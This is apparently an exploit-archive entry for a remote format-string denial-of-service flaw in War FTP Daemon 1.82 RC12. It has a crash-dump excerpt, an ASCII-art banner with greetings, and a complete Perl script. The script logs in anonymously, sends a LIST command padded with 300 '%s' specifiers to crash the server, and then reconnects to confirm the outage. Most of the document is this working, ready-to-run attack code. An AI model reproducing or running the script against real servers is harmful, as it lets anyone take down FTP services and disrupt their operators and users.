# [*] Vulnerability : War FTP Daemon Format String DoS (LIST command) # [*] Detected by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com) # [*] Type : remote DoS # [*] OS : Windows # [*] Product : Jgaa's War FTP Daemon # [*] Versions affected : 1.82 RC 12 # [*] Download link : http://www.warftp.org/?menu=344 # [*] ------------------------------------------------------------------------- # [*] Method : format string, only works with anonymous access # [*] Crash information #(8cc.598): Access violation - code c0000005 (!!! second chance !!!) #eax=00000001 ebx=0076e7b0 ecx=00000073 edx=00000002 esi=0076e6fe edi=0000000a #eip=00431680 esp=0076e6c0 ebp=00a1114a iopl=0 nv up ei pl nz na po nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 #war_ftpd+0x31680: #00431680 8a08 mov cl,byte ptr [eax] ds:0023:00000001=?? #0:001> d ebp #00a1114a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s% #00a1115a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s% #00a1116a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s% #00a1117a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s% #00a1118a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s% #00a1119a 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s% #00a111aa 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s% #00a111ba 73 25 73 25 73 25 73 25-73 25 73 25 73 25 73 25 s%s%s%s%s%s%s%s% # # # [*] Greetz&Tx to : Saumil/SK/hack4love/str0ke # [*] ------------------------------------------------------------------------- # MMMMM~. # MMMMM?. # MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM. # MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM: # MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM: # MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM: # MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM: # MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM: # =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM: # .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM: # .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,. # eip hunters # ----------------------------------------------------------------------------- # Script provided 'as is', without any warranty. # Use for educational purposes only. # # # # use IO::Socket; if ($#ARGV ne 1) { print " usage: $0 \n"; exit(0); } my $user="anonymous"; my $pass="anonymous@me.com"; print " [+] Preparing DoS payload\n"; my $payload=("%s" x 300); my $payload2 = "A" x 5000; print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n"; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => 'tcp'); $ftp = <$sock> || die " [!] *** Unable to connect ***\n"; print " ** $ftp"; $ftp = <$sock>; print " ** $ftp"; $ftp = <$sock>; print " ** $ftp"; $ftp = <$sock>; print " ** $ftp"; print " [+] Logging in (user $user)\n"; print $sock "USER $user\r\n"; $ftp = <$sock>; print " ** $ftp"; print $sock "PASS $pass\r\n"; $ftp = <$sock>; print " ** $ftp"; print " [+] Sending payload\n"; print $sock "LIST ".$payload."\r\n"; print $sock "BOOM !\r\n"; print " [+] Payload sent, now checking FTP server state\n"; $sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => 'tcp'); my $ftp2 = <$sock2> || die " [+] DoS successful\n"; print " [!] DoS did not seem to work\n"; print " ** $ftp2\n";